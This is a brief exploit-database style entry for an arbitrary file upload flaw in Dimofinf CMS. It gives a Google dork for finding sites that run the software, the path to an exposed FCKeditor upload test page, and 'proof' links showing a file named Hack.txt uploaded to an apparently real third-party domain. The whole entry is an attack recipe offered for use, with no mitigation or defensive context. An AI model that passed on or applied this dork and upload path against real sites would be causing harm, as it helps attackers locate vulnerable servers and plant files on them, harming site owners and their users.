Dimofinf CMS Arbitrary File Upload

# Exploit Title: Arbi Arbitrary File Upload Vulnerability
# Google Dork: intext:" Powered by Dimofinf "
# Date: 2017-12-20
# Author: Iran Anonymous
# Tested on: Win 7, Linux
***************************************************
# exploit => /editor/filemanager/connectors/uploadtest.html
# Add exploit => http://www.site.com/editor/filemanager/connectors/uploadtest.html ***************************************************
# Proof : http://www.arbi.ws//FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.arbi.ws///userfiles/Hack.txt =====================================================